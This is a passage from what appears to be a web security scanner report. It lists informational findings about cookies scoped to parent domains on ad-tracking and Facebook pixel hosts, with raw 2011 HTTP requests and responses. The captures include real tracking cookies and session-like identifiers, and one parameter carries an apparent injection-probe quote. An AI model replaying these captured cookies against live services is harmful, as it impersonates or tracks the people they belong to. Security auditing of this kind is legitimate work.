Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk3elPsVX+8er9duzVms/qpMm; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:26 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64ae&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:26 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:25 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.200. http://pix04.revsci.net/F08747/b3/0/3/1003161/887063996.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/887063996.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iDSaWM1VkT6a+g=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:24 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b4&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:24 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/887063996.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw69OD9iDSaWM1VkT6a+g=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:24 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b4&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:24 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:24 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.201. http://pix04.revsci.net/F08747/b3/0/3/1003161/934643839.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/934643839.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl0ESyMI1VkQha9I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:18 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a6&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/934643839.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCl0ESyMI1VkQha9I=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:18 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a6&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:18 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:18 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.202. http://pixel.facebook.com/ajax/register/logging.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.facebook.com
Path:	/ajax/register/logging.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/register/logging.php?action=form_focus&reg_instance=xNFJTYJu7tPBzUkyTEn2Ng8E&asyncSignal=7397 HTTP/1.1
Host: pixel.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF; lsd=J5foX; wd=1036x1012

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 67
Content-Type: image/png
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-FB-Server: 10.36.132.106
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-Cnection: close
Date: Wed, 02 Feb 2011 21:51:03 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

11.203. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dp_rec="{\"3\": 1296659629+ \"2\": 1296508071}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data_sync?partner_id=219 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]}"; subID="{}"; segments="3391|3392|11262|11265|30353|17277|38781|38582,1298044270|40657|10102"; dp_rec="{\"3\": 1296072684+ \"2\": 1296508071}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 02 Feb 2011 15:13:49 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 02-Feb-2011 15:13:29 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"3\": 1296659629+ \"2\": 1296508071}"; Domain=invitemedia.com; expires=Thu, 02-Feb-2012 15:13:49 GMT; Path=/
Content-Length: 510
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4316443142505&PixelID=186","javascrip
...[SNIP]...

11.204. http://pixel.mathtag.com/event/js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/event/js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ts=1296661418; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:43:38 GMT
uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:43:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event/js?mt_id=101971&mt_adid=100341&v1=&v2=&v3=&s1=&s2=&s3= HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4d3702bc-839e-0690-5370-3c19a9561295; ts=1296236272

Response

HTTP/1.1 200 OK
Server: mt2/1.2.3.967 Oct 13 2010-13:40:24 ewr-pixel-n2a pid 0x3c9c 15516
Cache-Control: no-cache
Content-Type: text/javascript
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Wed, 02 Feb 2011 15:43:38 GMT
Etag: 4d3702bc-839e-0690-5370-3c19a9561295
Connection: Keep-Alive
Set-Cookie: ts=1296661418; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:43:38 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: uuid=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: mt_mop=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: ts=; domain=pixel.mathtag.com; path=/; expires=Fri, 1-Jan-2000 18:21:31 GMT
Set-Cookie: trx=008; domain=.mathtag.com; path=/; expires=Sat, 19-Nov-2010 18:21:31 GMT
Set-Cookie: uuid=4d3702bc-839e-0690-5370-3c19a9561295; domain=.mathtag.com; path=/; expires=Thu, 02-Feb-2012 15:43:38 GMT
Content-Length: 2116

   /*
   http://action.mathtag.com/mm//TREE//red?nm=Homepage&s0=&s1=&s2=&v0=&v1=&v2=&ri=[RANDOM_NUMBER]
   http://www.googleadservices.com/pagead/conversion/1032222048/?label=p2U4CNy-gAIQ4OqZ7AM&guid=ON
...[SNIP]...

11.205. http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-78V15bIOxaPIs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EBEAG6ANq0itiBDbz6HJXbIAAb8BAfoFgfUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ; expires=Tue, 03-May-2011 15:17:19 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-78V15bIOxaPIs.gif?media=ad&labels=_imp.adserver.doubleclick,_imp.publisher.57234521,_imp.placement.233316945,_imp.creative.39601731 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EFMAG6ANq0itiBDbz6HJXbIAAb8BAfgFgbUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ

Response

HTTP/1.1 200 OK
Connection: close
